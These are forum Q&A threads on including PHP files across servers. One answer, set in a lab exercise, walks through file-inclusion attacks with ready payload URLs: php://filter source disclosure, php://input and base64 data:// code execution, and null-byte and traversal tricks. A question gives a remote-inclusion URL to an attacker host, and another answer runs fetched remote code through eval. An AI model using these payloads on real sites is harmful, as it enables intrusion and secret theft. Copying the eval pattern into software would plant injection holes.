I am trying to communicate between two servers through PHP. Lets say, there is one PHP file "a.php" on my localhost and another PHP file "b.php" on a remote server. I want to include b.php in a.php. I am trying to do this through include method by giving a full path of remore server "http://ip/b.php" but nothing happens.
Actually I want to run a part of script from a.php file then I want to communicate with b.php file and then return back to a.php file.
Please guide me how to do this. I know there are similar questions asked and I have tried to resolve this issue using those techniques but in vain.
Thank you
Nope, this setting is disabled/not allowed by default in most web servers (php.ini) so you can not use the include to include the files from a remote addresss for security reasons.
If you still want to allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini
But again it is a bad practice, in a security-oriented point of view ; and, so, it is generally disabled (I've never seen it enabled, actually)
If you want to read the contents of a remote file though, you can use the file_get_contents function instead BUT this will be returned as pure HTML markup code, there won't be any server-side code.
including php file from another server with php
Another Solution is
Save your file as a text file removing the from it.
Access the file using file_get_contents
Example
http://ip/b.php - save this file as b.txt
<?php
$filedata = file_get_contents('http://ip/b.txt');
eval ("?>$filedata");
?>
As much as it is unsafe and bad practice, you can always turn off php for particular directory, using .htaccess (php_flag engine off).
Then your files will be served directly as a text files to whoever know url. That way you can include them via allow_url_include or as Mad Angle said get_file_contets.
But either way - its bad idea. So you can try it for science :)
Related
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
include("home.html");
} else { include ($page . '.php'); }
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and include it.
And, there are still ways to exploit.
Let's look inside your code. You may notice that it automatically add an extension .php at the end of path. So you should remove php in GET param. But what if the file you want to include does not have PHP extension? Then use %00 to terminate string, such as
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the offcial manual for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
Before your test, I suggest you use Firefox with HackBar plugin. It's a powerful penetration testing suite.
Source disclosure
This feature doesn't need url inclusion allowed.
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source secret.inc.php in the same directory via following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
File content will be encoded in base64, so it does support binary file.
It's powerful to get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like /etc/passwd!
Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in request body, then you can execute any (allowed) function in remote server!
Don't forget the %00 to drop .php tail.
Besides, PHP supports data:// URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the phpinfo alone. Is there a way to encrypt? Of course. data:// URL supports at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!
Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contents or similar you could see the contents of the php file.
I have a PHP script called constants.php, in there I have a lot of valuable data, like my MySQL information, etc.
Is it possible to access that script outside my machine? Lets say, using the following: include http://www.fakewebsite.com/config/constants.php
Well, yes and no.
Yes: They will be able to access the output of the file constants.php (however most likely it will be blank).
No: They won't be able to access your variables. You can only access these before PHP has been parsed.
Let's read the docs:
If "URL fopen wrappers" are enabled in PHP (which they are in the
default configuration), you can specify the file to be included using
a URL (via HTTP or other supported wrapper - see Supported Protocols
and Wrappers for a list of protocols) instead of a local pathname. If
the target server interprets the target file as PHP code, variables
may be passed to the included file using a URL request string as used
with HTTP GET. This is not strictly speaking the same thing as
including the file and having it inherit the parent file's variable
scope; the script is actually being run on the remote server and the
result is then being included into the local script.
So you can actually load external files (if your admin allows you to). However, is it going to be useful in your case? Open http://www.fakewebsite.com/config/constants.php in your web browser and open the "View Source" menu. Whatever you see there, it's what your PHP script will see (most likely, a blank page).
Last but not least... Supposing that the remote server is configured to not execute *.php files or contains a PHP script that generates PHP code, why would you want to post all that valuable and sensitive data to the Internet?
If the URL is publically accessible, then yes, anyone can read it from the URL, including scripts.
However the key part here is that they will access the output of constants.php, not the file itself. They'll get exactly the same output as you would if you accessed the file from a web browser.
What they cannot do is include your actual PHP code by calling the URL. The URL is not a direct connection to the PHP file; it's a connection to the web server. The web server then processes the PHP file and provides the output. As long as the web server is processing the PHP file before sending the output, then your PHP code is safe. It can't be seen via the URL.
There may be other ways of getting at it, but not that way.
Yes, so long as you have access to the script, you can include it within your own scripts.
I need to include to my php script external php code which is situated for example by link http://site.com/code.php How could I do it? I tryed all ways which I found in internet but no one works. All methods are good to include text but not php script.
You can only include the code if it is served as text: otherwise everyone would be able to see / use your code.
So the options you have:
Get the file trough ftp and include it with include or require
Get the file in plaintext, by serving .php files on "site.com" as text. This is ofcourse not a good idea, as everyone could see your source from there.
Put the file on the same server as the script that wants to include it.
If you need just the file to be 'run', you can curl it. You won't get the source (cannot use its functions etc) but any actions it performs (make file? add something to the database) will be run.
It is not possible, unless you can get the source code to it (aka. its published somewhere or it is on a file system you can access).
According to the PHP documentation (http://php.net/manual/en/features.remote-files.php) "As long as allow_url_fopen is enabled in php.ini, you can use HTTP and FTP URLs with most of the functions that take a filename as a parameter. In addition, URLs can be used with the include(), include_once(), require() and require_once() statements (since PHP 5.2.0, allow_url_include must be enabled for these)."
If i had a text file on my web server, which contains full PHP code, all properly formatted, could i use PHP fopen to read the text file and echo the output of the PHP to the browser. Ie. Run PHP code that is held in a text file rather than hard coded?
Thanks
It's perfectly possible to do this (it's just another file after all), although I'd be tempted to directly include it rather that messing around with fopen/eval, etc. (N.B.: The file would of course have to be "fully formed" and begin with "<?php", etc. for the include to work.)
However, I'd be very wary of naming the file with a .txt extension as this will mean that it'll be possible to browse the contents of this file directly from the browser if it exists in the public HTTP docs area. As such, why not simply write the data into a .php file - this will be no more difficult than a .txt file and offers the advantage that it always be parsed by the web server if someone attempts to access it.
You can read in the file as you suggested using fopen you can then execute the string that is read in using eval. I wouldn't recommend this. Try another solution to what ever the actual problem is.
I was reading about PDO and I came across the parse_ini_file function. A number of developers suggested using this function to parse in db settings rather than hard coding the db settings in code for security reasons.
My question to you is, does it make sense to do a file read for every load of your PHP application for this extra "security" ?
I wonder how expensive this file read is..
php 5.3
in the comments
http://www.php.net/manual/en/class.pdo.php
I don't really see how it's any more secure.
For example, if your DB settings are stored in defines within a "config.php" file outside of the main web root, they're just as secure as if they're were stored in a .ini file and there would be no per-page parsing overhead (other than having to include the config file as per normal).
Hard coding settings in PHP files is bad because those same PHP files will be sent around, copied, put into repositories, etc. The passwords should be treated with more privacy. Also, it's annoying to have to the source files overwrite your local copies.
Note that I'm referring specifically to embedding in regular PHP files in your project's codebase. If you place your config settings in a PHP file that sits external to all of that, then none of the above applies.
If you are worried about the overhead of parsing one config file, then you shouldn't be using PHP at all... However, you could limit file reads by parsing it only when a cached (e.g., memcache) copy cannot be found.
It makes sense if you have more than just db access stored in the ini file . It can act like a config for you're app so you don't have to open 10 files to change 3 hardcoded variables/constants/whatever . If you don't like reading a file each time you're app is requested then use a php file to store all you're config options ( keep them all in one place is realy good ) , and as sugested keep the ini/php config file out of you're web root .
Probably not. If its a .ini file then a browser can just visit it and download it. At least a .php has a decency of a blank screen.